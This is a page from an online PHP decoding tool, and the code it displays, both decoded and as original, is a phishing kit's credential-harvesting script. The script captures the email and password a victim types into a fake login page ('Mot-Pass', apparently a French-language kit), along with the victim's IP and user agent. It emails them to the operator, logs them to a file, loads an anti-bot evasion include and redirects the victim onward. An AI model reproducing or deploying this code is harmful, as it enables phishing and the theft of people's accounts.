Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0); ob_start(); session_start(); include'../antibots.php'; ..

Decoded Output download

<?php 
	error_reporting(0); 
	ob_start(); 
	session_start(); 
 
include'../antibots.php'; 
	include '../email.php'; 
if($_SERVER['REQUEST_METHOD'] == 'POST'){ 
	$_SESSION['email'] 	= $_POST['mail']; 
	$_SESSION['pass'] 	= $_POST['pass']; 
$message = " 
Email : ".$_SESSION['email']." 
Mot-Pass : ".$_SESSION['pass']." 
IP: "._ip()." 
User Agent: ".$_SERVER["HTTP_USER_AGENT"]." 
"; 
$Subject="  K3N PPL FR3SH|"._ip(); 
$head="From: K3N M4573R  <Login>"; 
mail($my_mail,$Subject,$message,$head); 
$fil = fopen('', 'a+'); 
fwrite($fil, '####################'.$message.'####################'); 
$_SESSION['step_one']  = true; 
header('location: index.php?enc='.md5(time()).'&p=0&dispatch='.sha1(time())); 
 
} 
else 
{ 
	header('location: ../../index.php'); 
}  
 ?>

Did this file decode correctly?

Original Code

<?php
	error_reporting(0);
	ob_start();
	session_start();

include'../antibots.php';
	include '../email.php';
if($_SERVER['REQUEST_METHOD'] == 'POST'){
	$_SESSION['email'] 	= $_POST['mail'];
	$_SESSION['pass'] 	= $_POST['pass'];
$message = "
Email : ".$_SESSION['email']."
Mot-Pass : ".$_SESSION['pass']."
IP: "._ip()."
User Agent: ".$_SERVER["HTTP_USER_AGENT"]."
";
$Subject="  K3N PPL FR3SH|"._ip();
$head="From: K3N M4573R  <Login>";
mail($my_mail,$Subject,$message,$head);
$fil = fopen('', 'a+');
fwrite($fil, '####################'.$message.'####################');
$_SESSION['step_one']  = true;
header('location: index.php?enc='.md5(time()).'&p=0&dispatch='.sha1(time()));

}
else
{
	header('location: ../../index.php');
} 

Function Calls

ob_start 1
session_start 1
error_reporting 1

Variables

None

Stats

MD5 55708cbb2d0c5113aa5ac0a826b30c5a
Eval Count 0
Decode Time 85 ms